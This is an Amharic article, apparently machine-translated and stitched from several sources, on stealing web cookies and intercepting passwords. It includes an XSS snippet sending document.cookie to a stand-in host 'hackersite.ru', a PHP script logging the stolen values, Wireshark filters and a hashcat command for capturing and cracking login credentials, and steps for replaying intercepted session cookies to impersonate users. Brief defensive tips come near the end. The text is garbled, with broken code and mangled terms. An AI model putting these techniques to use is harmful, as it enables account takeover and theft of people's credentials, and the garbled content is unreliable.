ኩኪዎችን ለመስረቅ ፕሮግራሞች በአይፒ. ኩኪዎችን ለመስረቅ መንገዶች

ወደ ጎበኙት ጣቢያ ሲመለሱ ጣቢያው እርስዎን እንደሚያውቅ እና ባለፈው ጊዜ ባመለከቱት መቼት እንደሚከፍት አስተውለዋል? አዎ፣ እና ብዙ ጊዜ? ይህ የሆነበት ምክንያት እንደ መግቢያ፣ የይለፍ ቃል፣ የክፍለ-ጊዜ መታወቂያ እና ሌሎች ተለዋዋጮች ያሉ ጎብኝዎችን መረጃ የሚያከማቹ ኩኪዎች ጎብኝውን ለመለየት እና የገጹን ይዘት ለመጨረሻ ጊዜ ወደ ሃብቱ በጎበኙበት ወቅት በመረጣቸው የተጠቃሚ ምርጫዎች መሰረት ለማሳየት ያስፈልጋል። የዌብኩኪስ ስኒፈር ፕሮግራም ለተጠቃሚው በአሳሹ ውስጥ በተጠቃሚው የሚታዩትን ኩኪዎች እና ይዘቶቻቸውን ያሳያል።

ኩኪዎችን በመመልከት ላይ

እርስዎ ጣቢያውን እና WebCookiesSniffer ቀረጻዎችን ከፍተዋል። ኩኪዎች s በእውነተኛ ጊዜ. መገልገያው ሁሉንም የተያዙ ኩኪዎችን ስለ አስተናጋጁ፣ የጥያቄው መንገድ፣ የኩኪ ፋይሉ አጠቃላይ ርዝመት፣ የኩኪ ፋይሉ የተለዋዋጮች ብዛት እና የኩኪ ሕብረቁምፊ እራሱ ከተለዋዋጮች እና የእሴቶች ስም ጋር ወደሚያከማች ጠረጴዛ ላይ ያክላል። ስለ ኩኪዎች WebCookiesSniffer የተሰበሰበው መረጃ በጽሑፍ ፋይል ላይ ማስቀመጥ ይችላል። ፕሮግራሙ በሁሉም ወይም በተመረጡ ኩኪዎች ላይ የኤችቲኤምኤል ሪፖርት የማመንጨት ችሎታ አለው። ፕሮግራሙ እንዲሰራ የዊንፒካፕ ሾፌርን መጫን ያስፈልግዎታል (ከዌብኩኪስ ስኒፈር ጋር በማህደር ውስጥ አለ)። የWebCookiesSniffer ፕሮግራምን ወደ ራሽያኛ ለመቀየር የWebCookiesSniffer_lng.ini ፋይል (በተጨማሪም በማህደሩ ውስጥ የተካተተ) ከመገልገያው ጋር ወደ ማውጫው ይቅዱ።

የWebCookiesSniffer ቅጽበታዊ ገጽ እይታዎች

ኩኪ ምንድን ነው?

http አገልጋይ አንዳንድ ጽሑፋዊ መረጃዎችን በተጠቃሚው ኮምፒዩተር ላይ እንዲያከማች እና እንዲደርስበት የሚያስችል ዘዴ አለ። ይህ መረጃኩኪ ይባላል። በእውነቱ, እያንዳንዱ ኩኪ ጥንድ ነው: የመለኪያው ስም እና እሴቱ. እያንዳንዱ ኩኪ የራሱ የሆነበት ጎራም ተመድቧል። ለደህንነት ሲባል፣ በሁሉም አሳሾች ውስጥ፣ http አገልጋዩ የሚፈቀደው የራሱን የጎራ ኩኪ ብቻ ነው። በተጨማሪም, ኩኪዎች የማለቂያ ጊዜ ሊኖራቸው ይችላል, በዚህ ጊዜ ሁሉም የአሳሽ መስኮቶች የተዘጉ ቢሆኑም እስከዚህ ቀን ድረስ በኮምፒዩተር ላይ ይቀመጣሉ.

ለምን ኩኪዎች አስፈላጊ ናቸው?

በሁሉም የባለብዙ ተጠቃሚ ስርዓቶች ውስጥ ተጠቃሚውን ለመለየት ኩኪዎች ጥቅም ላይ ይውላሉ. ወይም ይልቁንስ የተጠቃሚው የአሁኑ ግንኙነት ከአገልግሎቱ ጋር የተጠቃሚው ክፍለ ጊዜ። አንድ ሰው የእርስዎን ኩኪዎች ካወቀ፣ እርስዎን ወክሎ መግባት ይችላል። ምክንያቱም በአሁኑ ጊዜ በጣም ጥቂት የበይነመረብ ሀብቶች በአንድ የተጠቃሚ ክፍለ ጊዜ የአይፒ አድራሻውን ለውጥ ይፈትሹ።

ኩኪዎችን እንዴት መቀየር ወይም መቀየር ይቻላል?

የአሳሽ ገንቢዎች ኩኪዎችን ለማረም አብሮ የተሰሩ መሳሪያዎችን አይሰጡም። ግን በመደበኛ ማስታወሻ ደብተር (ማስታወሻ ደብተር) ማግኘት ይችላሉ።

ደረጃ 1 የጽሑፍ ፋይል ከጽሑፍ ጋር ይፍጠሩ

የዊንዶውስ መዝገብ ቤት አርታኢ ስሪት 5.00

@="C:\\IE_ext.htm"

IE_ext.reg በሚለው ስም እናስቀምጠዋለን

ደረጃ 2 የተፈጠረውን ፋይል በመጠቀም በዊንዶውስ መዝገብ ላይ ለውጦችን ያክሉ።

ደረጃ 3፡ ከጽሑፍ ጋር የጽሑፍ ፋይል ይፍጠሩ

< script language="javascript">
external.menuArguments.clipboardData.setData ("ጽሑፍ" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "የሙከራ ስም=የፈተና እሴት፤ መንገድ=/፤ ጎራ=testdomain.ru";
ማንቂያ (ውጫዊ.menuArguments.document.cookie);

እንደ C: \ IE_ext.htm አድርገው ያስቀምጡት

ደረጃ 4: ወደ እኛ ፍላጎት ወደ ድረ-ገጽ እንሄዳለን.

ደረጃ 5: በገጹ ላይ ባለው ባዶ ቦታ ላይ በቀኝ ጠቅ ያድርጉ እና የምናሌውን ንጥል ይምረጡ "ከኩኪዎች ጋር መስራት". ወደ ቅንጥብ ሰሌዳው መዳረሻ ፍቀድ። የዚህ ጣቢያ ኩኪዎችዎ በቅንጥብ ሰሌዳው ላይ ይቀመጣሉ። የማስታወሻ ደብተራቸውን (ማስታወሻ ደብተር) መለጠፍ እና ማየት ይችላሉ።

ደረጃ 6፡ አንዳንድ ኩኪዎችን ለመቀየር የC:\IE_ext.htm ፋይልን በመተካት ያርትዑ። የሙከራ ስምበኩኪው ስም ፣ የሙከራ ዋጋ- ስለ ትርጉሙ testdomain.com- ወደ ድር ጣቢያው ጎራ. አስፈላጊ ከሆነ እንደዚህ አይነት ተጨማሪ መስመሮችን ያክሉ. ለቁጥጥር ምቹነት፣ ከለውጡ በፊት እና በኋላ የወቅቱን ኩኪዎች ውጤት ወደ ስክሪፕቱ ጨምሬአለሁ። ማንቂያ (ውጫዊ.menuArguments.document.cookie);

ደረጃ 7፡ ደረጃ 5ን እንደገና ያሂዱ እና ገጹን ያድሱት።

ቁም ነገር፡ ወደዚህ የበይነመረብ ምንጭ ከተዘመኑ ኩኪዎች ጋር እንሄዳለን።

በጃቫስክሪፕት ኩኪዎችን እንዴት መስረቅ ይቻላል?

አንድ አጥቂ በተጠቂው ኮምፒውተር ላይ የዘፈቀደ የጃቫ ስክሪፕት ስክሪፕት የሚያስፈጽምበትን መንገድ ካገኘ፣ አሁን ያሉትን ኩኪዎች በቀላሉ ማንበብ ይችላል። ለምሳሌ:

varstr=ሰነድ.cookie;

ግን ወደ እሱ ጣቢያ ሊያስተላልፋቸው ይችል ይሆን, ምክንያቱም ቀደም ብዬ እንደገለጽኩት, የጃቫ ስክሪፕት ስክሪፕት ያለ ተጨማሪ ማረጋገጫ በሌላ ጎራ ውስጥ የሚገኝን ጣቢያ ማግኘት አይችልም? የጃቫ ስክሪፕት ስክሪፕት በማንኛውም http አገልጋይ ላይ የሚገኝ ማንኛውንም ምስል ሊጭን ይችላል። በተመሳሳይ ጊዜ, በማውረድ ጥያቄ ውስጥ ማንኛውንም የጽሑፍ መረጃ ወደዚህ ስዕል ያስተላልፉ. ለምሳሌ: http://hackersite.ru/xss.jpg?text_infoስለዚህ ይህን ኮድ ካስኬዱ፡-

varimg= newImage ();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI (document.cookie);

ከዚያ ኩኪዎቹ "ሥዕሉን" ለማውረድ እና "ለአጥቂው ይውጡ" በሚለው ጥያቄ ውስጥ ይሆናሉ.

"ስዕል" ለመስቀል እንደዚህ አይነት ጥያቄዎችን እንዴት መያዝ ይቻላል?

አጥቂ የ php ድጋፍ ያለው ማስተናገጃ ማግኘት እና እንደዚህ ያለ ኮድ ማስቀመጥ ብቻ ነው የሚያስፈልገው።

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp = ፎፔን ("log.txt", "a");
fputs($fp፣$uid\n");
fclose ($ fp);
?>

ከዚያ ሁሉም የዚህ ስክሪፕት መጠይቅ መለኪያዎች በፋይሉ ውስጥ ይቀመጣሉ። log.txt. ለመተካት ቀደም ሲል በተገለጸው የጃቫ ስክሪፕት ስክሪፕት ውስጥ ብቻ ይቀራል http://hackersite.ru/xss.jpgወደዚህ የ php ስክሪፕት መንገድ።

ውጤት

የXSS ተጋላጭነቶችን ለመጠቀም ቀላሉ መንገድ ብቻ አሳይቻለሁ። ነገር ግን በብዙ ተጠቃሚ የኢንተርኔት ድረ-ገጽ ላይ ቢያንስ አንድ እንደዚህ አይነት ተጋላጭነት መኖሩ አጥቂው ሀብቱን እርስዎን ወክሎ እንዲጠቀም ሊፈቅድለት እንደሚችል ያረጋግጣል።

ብዙ ተጠቃሚዎች በተዘጋው የኢንተርኔት ምንጭ ሲመዘገቡ ወይም ሲፈቅዱ እና ENTER ን ሲጫኑ መግቢያውን እና የይለፍ ቃሉን በመሙላት ይህንን መረጃ በቀላሉ መጥለፍ እንደሚቻል አያውቁም። በጣም ብዙ ጊዜ በአውታረ መረቡ ላይ ደህንነቱ ባልተጠበቀ መልኩ ይተላለፋሉ. ስለዚህ ለመግባት የሚሞክሩት ድረ-ገጽ የኤችቲቲፒ ፕሮቶኮልን የሚጠቀም ከሆነ ይህን ትራፊክ ለመያዝ፣ Wiresharkን በመጠቀም መተንተን እና የይለፍ ቃሉን ለማግኘት እና ዲክሪፕት ለማድረግ ልዩ ማጣሪያዎችን እና ፕሮግራሞችን መጠቀም በጣም ቀላል ነው።

የይለፍ ቃሎችን ለመጥለፍ በጣም ጥሩው ቦታ የአውታረ መረቡ ዋና አካል ነው ፣ የሁሉም ተጠቃሚዎች ትራፊክ ወደ ዝግ ሀብቶች (ለምሳሌ ፣ ሜይል) ወይም ወደ ራውተር ፊት ለፊት በውጫዊ ሀብቶች ላይ ሲመዘገቡ በይነመረብን ለማግኘት ይሄዳል። መስተዋት አዘጋጅተናል እና እንደ ጠላፊ ለመሰማት ዝግጁ ነን.

ደረጃ 1 ትራፊክን ለመያዝ Wiresharkን ይጫኑ እና ያሂዱ

አንዳንድ ጊዜ ለዚህ ትራፊክ ለመያዝ ያቀድንበትን በይነገጽ ብቻ መምረጥ በቂ ነው, እና የጀምር አዝራሩን ጠቅ ያድርጉ. በእኛ ሁኔታ, ገመድ አልባ እንይዛለን.

ትራፊክ መያዝ ተጀምሯል።

ደረጃ 2. የተያዙ የPOST ትራፊክን በማጣራት ላይ

አሳሹን እንከፍተዋለን እና የተጠቃሚ ስም እና የይለፍ ቃል ተጠቅመን ወደ ማንኛውም መገልገያ ለመግባት እንሞክራለን። የፍቃድ አሰጣጥ ሂደቱን እንደጨረስን እና የጣቢያው መከፈት, በ Wireshark ውስጥ ትራፊክ መያዙን እናቆማለን. በመቀጠል የፕሮቶኮል ተንታኙን ይክፈቱ እና ብዙ ቁጥር ያላቸውን እሽጎች ይመልከቱ። ብዙ የአይቲ ባለሙያዎች ቀጥሎ ምን ማድረግ እንዳለባቸው ስለማያውቁ ተስፋ የሚቆርጡበት ደረጃ ይህ ነው። ነገር ግን እኛ እናውቃለን እና በአሳሹ ውስጥ "መግባት" ወይም "ፍቃድ" የሚለውን ቁልፍ ሲጫኑ በአካባቢያችን ማሽኑ ላይ የሚመነጩ እና ወደ ሩቅ አገልጋይ የሚላኩ የPOST ውሂብ የያዙ ልዩ ፓኬቶችን እንፈልጋለን። .

የተያዙ እሽጎችን ለማሳየት በመስኮቱ ውስጥ ልዩ ማጣሪያ ያስገቡ፡- http.ጥያቄዘዴ =="ይለጥፉ”

እና ከአንድ ሺህ ፓኬጆች ይልቅ, እኛ የምንፈልገውን ውሂብ የያዘ አንድ ብቻ ነው የምናየው.

ደረጃ 3. የተጠቃሚ ስም እና የይለፍ ቃል ያግኙ

በፍጥነት ጠቅ ያድርጉ የቀኝ አዝራርመዳፊት እና ከምናሌው ውስጥ ይምረጡ TCPteamን ተከተል

ከዚያ በኋላ, ጽሑፍ በአዲስ መስኮት ውስጥ ይታያል, ይህም በኮዱ ውስጥ የገጹን ይዘት ወደነበረበት ይመልሳል. ከይለፍ ቃል እና የተጠቃሚ ስም ጋር የሚዛመዱትን "የይለፍ ቃል" እና "ተጠቃሚ" መስኮችን እንፈልግ። በአንዳንድ ሁኔታዎች, ሁለቱም መስኮች ለማንበብ ቀላል እና ኢንክሪፕት እንኳን አይሆኑም, ነገር ግን እንደ Mail.ru, Facebook, Vkontakte, ወዘተ የመሳሰሉ በጣም የታወቁ ሀብቶችን ስንደርስ ትራፊክ ለመያዝ እየሞከርን ከሆነ, የይለፍ ቃሉ ይሆናል. ኮድ የተደረገ፡

HTTP/1.1 302 ተገኝቷል

አገልጋይ፡ Apache/2.2.15 (CentOS)

X-የተጎላበተው-በ: ፒኤችፒ/5.3.3

P3P፡ CP="NOI ADM DEV PSAi COM NAV Our OTRo STP IND DEM"

አዘጋጅ-ኩኪ: የይለፍ ቃል = ; ጊዜው የሚያበቃው=Thu፣ 07-ህዳር-2024 23፡52፡21 ጂኤምቲ; መንገድ=/

ቦታ፡ loggedin.php

የይዘት ርዝመት፡ 0

ግንኙነት፡ ዝጋ

የይዘት ዓይነት፡ ጽሑፍ/html; charset=UTF-8

ስለዚህ በእኛ ሁኔታ፡-

የተጠቃሚ ስም: networkguru

ፕስወርድ:

ደረጃ 4 የይለፍ ቃሉን ለመፍታት የመቀየሪያውን አይነት ይወስኑ

ለምሳሌ ወደ http://www.onlinehashcrack.com/hash-identification.php#res ድረ-ገጽ እንሄዳለን እና የይለፍ ቃላችንን በመታወቂያ መስኮቱ ውስጥ አስገባን። በቅደም ተከተል የመቀየሪያ ፕሮቶኮሎች ዝርዝር ተሰጠኝ፡-

ደረጃ 5፡ የተጠቃሚ ይለፍ ቃል ዲክሪፕት ያድርጉ

በዚህ ደረጃ፣ የ hashcat መገልገያን መጠቀም እንችላለን፡-

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

በውጤቱ ላይ ዲክሪፕት የተደረገ የይለፍ ቃል ተቀበልን ቀላል የይለፍ ቃል

በመሆኑም በዊሬሻርክ እርዳታ በአፕሊኬሽን እና በአገልግሎቶች አሰራር ላይ ያሉ ችግሮችን መፍታት ብቻ ሳይሆን ተጠቃሚዎች በድረ-ገጽ የሚገቡትን የይለፍ ቃሎች በመጥለፍ እራሳችንን እንደ ሰርጎ ገቦች መሞከር እንችላለን። እንዲሁም የይለፍ ቃሎችን ማወቅ ይችላሉ። የፖስታ ሳጥኖችለማሳየት ቀላል ማጣሪያዎችን የሚጠቀሙ ተጠቃሚዎች፡-

የPOP ፕሮቶኮል እና ማጣሪያው ይህን ይመስላል፡ pop.request.command == "USER" || pop.request.command == "PASS"
የIMAP ፕሮቶኮል እና ማጣሪያው የሚከተሉት ይሆናሉ፡- imap.request "መግባት" ይዟል
የ SMTP ፕሮቶኮል እና የሚከተለውን ማጣሪያ ማስገባት ያስፈልግዎታል: smtp.req.command == "AUTH"

እና ይበልጥ ከባድ የሆኑ መገልገያዎች የኢኮዲንግ ፕሮቶኮሉን መፍታት።

ደረጃ 6. ትራፊኩ ከተመሰጠረ እና HTTPS ቢጠቀምስ?

ይህንን ጥያቄ ለመመለስ ብዙ አማራጮች አሉ.

አማራጭ 1. በተጠቃሚው እና በአገልጋዩ መካከል ካለው ግንኙነት ጋር ይገናኙ እና ግንኙነቱ በተፈጠረበት ጊዜ ትራፊኩን ይያዙ (SSL Handshake)። በግንኙነት መመስረት ጊዜ የክፍለ-ጊዜው ቁልፍ ሊጠለፍ ይችላል.

አማራጭ 2፡ በፋየርፎክስ ወይም በChrome የተፃፈውን የክፍለ ጊዜ ቁልፍ መዝገብ ፋይል በመጠቀም HTTPS ትራፊክን መፍታት ትችላለህ። ይህንን ለማድረግ አሳሹ እነዚህን የኢንክሪፕሽን ቁልፎች ወደ ሎግ ፋይል (FireFox ላይ የተመሰረተ ምሳሌ) ለመፃፍ መዋቀር አለበት እና ይህን የምዝግብ ማስታወሻ ፋይል መቀበል አለብዎት። በመሰረቱ የክፍለ ጊዜ ቁልፍ ፋይሉን መስረቅ አለቦት የኮምፒውተር ሃርድ ድራይቭሌላ ተጠቃሚ (ይህም ህገወጥ ነው). ደህና፣ ከዚያ ትራፊኩን ይያዙ እና የተቀበለውን ቁልፍ ዲክሪፕት ለማድረግ ይተግብሩ።

ማብራሪያ።እየተናገርን ያለነው የይለፍ ቃሉ ስለሚሰረቅ ሰው የድር አሳሽ ነው። የራሳችንን HTTPS ትራፊክ ዲክሪፕት ማድረግ ከፈለግን እና መለማመድ ከፈለግን ይህ ስልት ይሰራል። የሌሎች ተጠቃሚዎችን HTTPS ትራፊክ ወደ ኮምፒውተሮቻቸው ሳይደርሱ ዲክሪፕት ለማድረግ እየሞከሩ ከሆነ አይሰራም - ምስጠራ እና ግላዊነት ለዚያ ነው።

በአማራጭ 1 ወይም 2 መሠረት ቁልፎቹን ከተቀበሉ በኋላ በ WireShark ውስጥ መመዝገብ አለብዎት:

ወደ ምናሌው ይሂዱ አርትዕ - ምርጫዎች - ፕሮቶኮሎች - SSL.
ባንዲራውን ያዘጋጁ "በርካታ TCP ክፍሎችን የሚሸፍኑ የኤስ ኤስ ኤል መዝገቦችን እንደገና ያሰባስቡ"።
"RSA ቁልፎች ዝርዝር" እና አርትዕን ጠቅ ያድርጉ.
በሁሉም መስኮች ውስጥ ውሂብ ያስገቡ እና በፋይሉ ውስጥ ዱካውን ከቁልፍ ጋር ይፃፉ

አንዳንድ ድረ-ገጾች እንዴት ጎብኝዎችን ለግል ያዘጋጃሉ ብለው አስበህ ታውቃለህ? ይህ ለምሳሌ የ "ጋሪው" ይዘትን በማስታወስ (ይህ መስቀለኛ መንገድ ለሸቀጦች ሽያጭ የታሰበ ከሆነ) ወይም የአንዳንድ ቅፅ መስኮችን በሚሞሉበት መንገድ ሊገለጽ ይችላል. የአለም አቀፍ ድርን ተግባር የሚያጠናክረው የኤችቲቲፒ ፕሮቶኮል ከአንድ ጣቢያ ጉብኝት ወደ ሌላው የሚመጡ ክስተቶችን ለመከታተል የሚያስችል ዘዴ ስለሌለው እንደዚህ ያሉትን "ግዛቶች" ለማከማቸት ልዩ ተጨማሪዎች ተዘጋጅቷል. ይህ ዘዴ፣ በ RFC 2109 ውስጥ የተገለጸው፣ ልዩ ቁርጥራጮችን ወደሚተላለፉ የኤችቲቲፒ ጥያቄዎች እና ምላሾች ያስገባል። የኩኪ ውሂብ, ይህም ድረ-ገጾች ጎብኚዎቻቸውን እንዲከታተሉ ያስችላቸዋል.

እነዚህ ኩኪዎች ለክፍለ-ጊዜው ቆይታ ሊታወሱ ይችላሉ ( በአንድ ክፍለ ጊዜ), ውስጥ መቆየት የዘፈቀደ መዳረሻ ማህደረ ትውስታበአንድ ክፍለ ጊዜ ውስጥ እና አሳሹ ሲዘጋ ይሰረዛል, ወይም የተወሰነ ጊዜ ካለፈ በኋላም እንኳ. በሌሎች ሁኔታዎች, ቋሚ ናቸው ( የማያቋርጥ), በተጠቃሚው ሃርድ ድራይቭ ላይ እንደ የጽሑፍ ፋይል ይቀራል. ብዙውን ጊዜ በኩኪዎች ማውጫ ውስጥ ይቀመጣሉ (% windir%\ኩኪዎች በWin9x እና % የተጠቃሚ መገለጫ% ኩኪዎች በ NT/2000)። በበይነመረብ ላይ ኩኪዎችን ከጠለፉ በኋላ አጥቂ የዚህን ኮምፒዩተር ተጠቃሚ ማስመሰል ወይም በእነዚህ ፋይሎች ውስጥ ያሉትን ጠቃሚ መረጃዎች ሊሰበስብ እንደሚችል መገመት ከባድ አይደለም። የሚከተሉትን ክፍሎች ካነበቡ በኋላ ይህን ለማድረግ ምን ያህል ቀላል እንደሆነ ይረዱዎታል.

የኩኪዎች መጥለፍ

በጣም ቀጥተኛው መንገድ ኩኪዎችን በአውታረ መረቡ ላይ ስለሚተላለፉ መጥለፍ ነው. የተጠለፈው መረጃ ወደ ተገቢው አገልጋይ ሲገባ ጥቅም ላይ ሊውል ይችላል. እንዲህ ዓይነቱ ተግባር ማንኛውንም የፓኬት መጥለፍ መገልገያ በመጠቀም ሊፈታ ይችላል ፣ ሆኖም ፣ ከምርጦቹ ውስጥ አንዱ የላቭረንቲ ኒኩላ ፕሮግራም ነው። ላውረንቲዩ ኒኩላ) ስፓይኔት/ፔፕኔት. ስፓይኔት አብረው የሚሰሩ ሁለት መገልገያዎችን ያካትታል። ፕሮግራም CaptureNetፓኬጁን ራሱ ይይዝ እና ወደ ዲስክ ያስቀምጠዋል, እና የፔፕኔት መገልገያ ፋይሉን ከፍቶ ወደ ሊነበብ ቅርጸት ይለውጠዋል. የሚከተለው ምሳሌ በፔፕኔት የተመለሰ የአንድ ክፍለ ጊዜ ቁራጭ ነው፣ በዚህ ጊዜ ኩኪው የአሰሳ ገፆችን መዳረሻ ለማረጋገጥ እና ለመቆጣጠር ጥቅም ላይ ይውላል (ስሞች እንዳይገለጽ ለማድረግ ተለውጠዋል)።

አግኝ http://www.victim.net/images/logo.gif HTTP/1.0 ተቀበል፡ */* አጣቃሽ፡ http://www.victim.net/ አስተናጋጅ፡ www.victim.net ኩኪ፡ jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

ከላይ ባለው ምሳሌ ላይ ለአገልጋዩ በ HTTP ጥያቄ ውስጥ የተቀመጠው የኩኪ ቁራጭ ማየት ይችላሉ። በጣም አስፈላጊው መስክ ነው ምግብ=ተጠቃሚውን በwww.victim.net ላይ ለማረጋገጥ የሚያገለግል ልዩ መለያን ይገልጻል። እናስብ ከዚያ በኋላ አጥቂው ድረ-ገጽን የጎበኘው victim.net የራሱን መለያ እና ኩኪ እንዳገኘ (አስተናጋጁ የኩኪ ውሂቡን በምናባዊ ማህደረ ትውስታ ውስጥ እንዳያስቀምጠው ይገመታል፣ነገር ግን ይጽፋል። ኤችዲዲ). ከዚያም አጥቂው የራሱን ኩኪ መክፈት እና በውስጡ ያለውን cuid= መስክ መለያ ከተያዘው ፓኬት መተካት ይችላል። በዚህ አጋጣሚ ወደ ተጠቂው.net አገልጋይ ሲገቡ የኩኪ መረጃው እንደ ተጠለፈ ተጠቃሚ ተደርጎ ይወሰዳል።

የፕሮግራም ችሎታ ፒፕ ኔትሙሉውን የግንኙነት ክፍለ ጊዜ ወይም ቁርጥራጮቹን እንደገና ማባዛት የዚህ ዓይነቱን ጥቃቶች ትግበራ በእጅጉ ያመቻቻል። በአዝራር ሂድ ውሰድ!ቀደም ሲል በ CaptureNet ፕሮግራም የተጠለፈውን የኩኪ ውሂቡን ተጠቅሞ በተጠቃሚው የተመለከቱትን ገፆች መልሰው ማግኘት ይቻላል። በፔፕኔት መገልገያ የንግግር ሳጥን ውስጥ ስለ አንድ ሰው የተፈጸሙ ትዕዛዞች መረጃ ማየት ይችላሉ። በዚህ አጋጣሚ በ CaptureNet ፕሮግራም የተጠለፈ የኩኪ መረጃ ለማረጋገጫ ጥቅም ላይ ይውላል። በክፍለ-ጊዜው የውሂብ መገናኛው ታችኛው ቀኝ ጥግ ላይ ያለውን ፍሬም እና ኩኪ፡ መስመርን ተከትሎ ያለውን መስመር አስተውል። ይህ በማረጋገጫ ውስጥ ጥቅም ላይ የዋለው የኩኪ ውሂብ ነው።

ይህ በጣም ቆንጆ ብልሃት ነው። በተጨማሪም መገልገያው CaptureNetማቅረብ ይችላል። የተሟላ መዝገብዲክሪፕት የተደረገ ትራፊክ፣ ይህም እንደ Sniffer Pro ከኔትወርክ Associates፣ Inc. ካሉ ሙያዊ ደረጃ መገልገያዎች አቅም ጋር እኩል ነው። ይሁን እንጂ መገልገያው ስፓይኔትእንዲያውም የተሻለ - በነጻ ሊያገኙት ይችላሉ!

የመከላከያ እርምጃዎች

ሚስጥራዊነት ያለው የመታወቂያ ውሂብን ለማረጋገጥ እና ለማከማቸት ኩኪዎችን ከሚጠቀሙ ጣቢያዎች ይጠንቀቁ። እርስዎን ለመጠበቅ የሚረዳው አንዱ መሣሪያ የ Kookaburra ሶፍትዌር ኩኪ ፓል ነው፣ እሱም http://www.kburra.com/cpal.html ላይ ይገኛል። ይህ የሶፍትዌር ምርት አንድ ድረ-ገጽ የኩኪ ዘዴን ለመጠቀም ሲሞክር ለተጠቃሚው የማስጠንቀቂያ መልእክት እንዲያመነጭ ሊዋቀር ይችላል። በዚህ ሁኔታ, "ከመድረክ በስተጀርባ መመልከት" እና እነዚህን ድርጊቶች ለመፍቀድ መወሰን ይችላሉ. ኢንተርኔት ኤክስፕሎረር አብሮ የተሰራ የኩኪ ድጋፍ ዘዴ አለው። እሱን ለማንቃት የቁጥጥር ፓነልን የኢንተርኔት አማራጮች አፕል ያስጀምሩ፣ ወደ ሴኪዩሪቲ ትሩ ይሂዱ፣ የኢንተርኔት ዞን ንጥልን ይምረጡ፣ ብጁ ደረጃ ሁነታን ያቀናብሩ እና መቀየሪያውን ወደ ቀጣይ እና ጊዜያዊ የኩኪ መረጃ ይጠይቁ። በ Netscape አሳሽ ውስጥ የኩኪዎችን አጠቃቀም ማቀናበር ትዕዛዙን በመጠቀም ይከናወናል አርትዕ › ምርጫዎች › የላቀእና ኩኪን ከመቀበላችሁ በፊት አስጠንቅቁኝ ወይም ኩኪዎችን ሁነታ አሰናክል (ምስል 16.3)። ኩኪን በሚቀበሉበት ጊዜ በዲስክ ላይ የተጻፈ መሆኑን ማረጋገጥ እና ድረ-ገጹ ስለተጠቃሚዎች መረጃ እንደሚሰበስብ ማረጋገጥ ያስፈልግዎታል.

ለማረጋገጫ ኩኪዎች ጥቅም ላይ የሚውሉበትን ጣቢያ ሲጎበኙ በመጀመሪያ ሪፖርት የተደረጉት ስም እና የይለፍ ቃል ቢያንስ የኤስኤስኤል ፕሮቶኮሎችን በመጠቀም የተመሰጠሩ መሆናቸውን ማረጋገጥ አለብዎት። ይህ መረጃ በፔፕኔት መስኮት ውስጥ ይታያል፣ ቢያንስ በግልፅ ጽሑፍ ውስጥ አይታይም።

ብዙ በተደጋጋሚ የሚጎበኙ ድረ-ገጾች ይህን ሁነታ የማያስፈልጋቸው ከሆነ ደራሲዎቹ ኩኪዎችን ሙሉ በሙሉ መቃወም ይመርጣሉ። ለምሳሌ፣ የማይክሮሶፍት አለምአቀፍ ተወዳጅ የሆትሜል አገልግሎት ለመመዝገብ ኩኪዎችን ይፈልጋል። ይህ አገልግሎት በማረጋገጥ ሂደት ውስጥ ብዙ የተለያዩ አገልጋዮችን ስለሚጠቀም ወደ የታመኑ ጣቢያዎች ዞን ማከል ቀላል አይደለም (ይህ ሂደት "የደህንነት ዞኖችን በጥበብ መጠቀም፡ ለአክቲቪስ ቁጥጥር ችግር የጋራ መፍትሄ" በሚለው ውስጥ ተገልጿል)። በዚህ አጋጣሚ * .hotmail.com የሚለው ስያሜ ይረዳል። ኩኪዎች ለኤችቲኤምኤል ፕሮቶኮል አለመሟላት ፍፁም መፍትሄ በጣም የራቁ ናቸው፣ነገር ግን አማራጭ አካሄዶች የባሰ ይመስላል (ለምሳሌ፣ በፕሮክሲ ሰርቨሮች ላይ ሊከማች የሚችል መለያ ወደ URL ማከል)። የተሻለ ሀሳብ እስኪመጣ ድረስ ብቸኛ መውጫው ከላይ የተዘረዘሩትን ዘዴዎች በመጠቀም ኩኪዎችን መቆጣጠር ነው።

ኩኪዎችን በዩአርኤል ያንሱ

አንድ የሚያስደነግጥ ነገር አስቡት፡ የኢንተርኔት ኤክስፕሎረር ተጠቃሚዎች በልዩ ሁኔታ የተሰሩ ሃይፐርሊንኮችን ጠቅ አድርገው ኩኪዎቻቸውን ለመጥለፍ አደጋ ላይ ጥለው ተጠቂ ይሆናሉ። ቤኔት ሃዘልተን (እ.ኤ.አ. ቤኔት ሃሴልተን) እና ጄሚ ማካርቲ ( ጄሚ ማካርቲ) ከPeacefire የተሰኘው በአሥራዎቹ ዕድሜ ውስጥ የሚገኝ ድርጅት በኢንተርኔት የመግባቢያ ነፃነትን የሚደግፈው ይህንን ሐሳብ ሕያው የሚያደርግ ስክሪፕት አሳትሟል። ተጠቃሚው በዚህ ገጽ ላይ ባለው አገናኝ ላይ ጠቅ ካደረገ ይህ ስክሪፕት ኩኪዎችን ከደንበኛው ኮምፒዩተር ያወጣል። በውጤቱም, የኩኪው ይዘት ለድር ጣቢያው ኦፕሬተሮች ይቀርባል.

ይህ ባህሪ የ IFRAME መለያዎችን በድረ-ገጽ HTML ኮድ፣ በኤችቲኤምኤል ኢሜል መልእክት ወይም በዜና ቡድን መልእክት ውስጥ በመክተት አላግባብ ጥቅም ላይ ሊውል ይችላል። የሚከተለው ምሳሌ፣ በደህንነት አማካሪው ሪቻርድ ኤም.ስሚዝ የቀረበው፣ የIFRAME መያዣዎችን በPeacefire ከተሰራ መገልገያ ጋር የመጠቀም ችሎታን ያሳያል።

